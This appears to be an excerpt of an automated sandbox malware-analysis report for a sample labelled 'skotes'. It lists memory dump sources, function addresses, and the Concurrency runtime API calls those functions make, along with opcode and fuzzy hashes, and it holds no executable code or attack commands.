                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2508902052-0
                                                                                                                                              • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                              • Instruction ID: 90d9306956e5cc9bb6704af0189ae29657119f80b0b7e1970bf61bc55afc2ad7
                                                                                                                                              • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                              • Instruction Fuzzy Hash: FA818C71F00225AFCB18DFA9D580A6EB7F1FF98304B6542AED405A7711CB74AD42CB88
                                                                                                                                              Function 0042EC48 Relevance: 6.1, APIs: 4, Instructions: 139COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042EC81
                                                                                                                                                • Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50
                                                                                                                                              • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0042ECE7
                                                                                                                                              • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0042ECFF
                                                                                                                                              • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0042ED0C
                                                                                                                                                • Part of subcall function 0042E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E7D7
                                                                                                                                                • Part of subcall function 0042E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E86F
                                                                                                                                                • Part of subcall function 0042E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E879
                                                                                                                                                • Part of subcall function 0042E7AF: Concurrency::location::_Assign.LIBCMT ref: 0042E8AD
                                                                                                                                                • Part of subcall function 0042E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E8B5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2363638799-0
                                                                                                                                              • Opcode ID: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
                                                                                                                                              • Instruction ID: 5e7ff754d2b343dc4c16742e0cc3e1cb9d27b644ec3e5e3051372794b2f11420
                                                                                                                                              • Opcode Fuzzy Hash: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
                                                                                                                                              • Instruction Fuzzy Hash: 8051E335B10225EBCF14DF52D885BAEB771AF44314F5540AAE9027B392CB78AE02CB95
                                                                                                                                              Function 0041CB97 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • NtFlushProcessWriteBuffers.NTDLL ref: 0041CBAA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: BuffersFlushProcessWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2982998374-0
                                                                                                                                              • Opcode ID: 20c4ea3e2129b60a1e4d1eea87152ba57400039f21031a1d2e21638d1c4937de
                                                                                                                                              • Instruction ID: 734eec717fe04ada3b4bcf7b1b1ccceb46d859c39f6a646686bea7d52c1b0365
                                                                                                                                              • Opcode Fuzzy Hash: 20c4ea3e2129b60a1e4d1eea87152ba57400039f21031a1d2e21638d1c4937de
                                                                                                                                              • Instruction Fuzzy Hash: DFB09236A1B93047CA512B14BC4859E7714AA80B1270A01A6E805A72348A54AD828BDD
                                                                                                                                              Function 0041DD91 Relevance: .1, Instructions: 144COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9aa71377ddf51d54108bd68bc2459ad0f115ceeb009950e0c4d0192850e4ba90
                                                                                                                                              • Instruction ID: 73b31feacec7ce9fe7b0550b3c6203be5604da4ad9e3037c20952e2b0bfc5a30
                                                                                                                                              • Opcode Fuzzy Hash: 9aa71377ddf51d54108bd68bc2459ad0f115ceeb009950e0c4d0192850e4ba90
                                                                                                                                              • Instruction Fuzzy Hash: E251B0B2D05B068BDB15CF58D8917AAB7F1FB48304F24856BC405EB350E3B8A980CF59
                                                                                                                                              Function 004326D1 Relevance: 22.7, APIs: 15, Instructions: 231COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004326E3
                                                                                                                                                • Part of subcall function 004324E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432504
                                                                                                                                              • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432704
                                                                                                                                              • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00432711
                                                                                                                                              • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0043275F
                                                                                                                                              • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 004327E6
                                                                                                                                              • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 004327F9
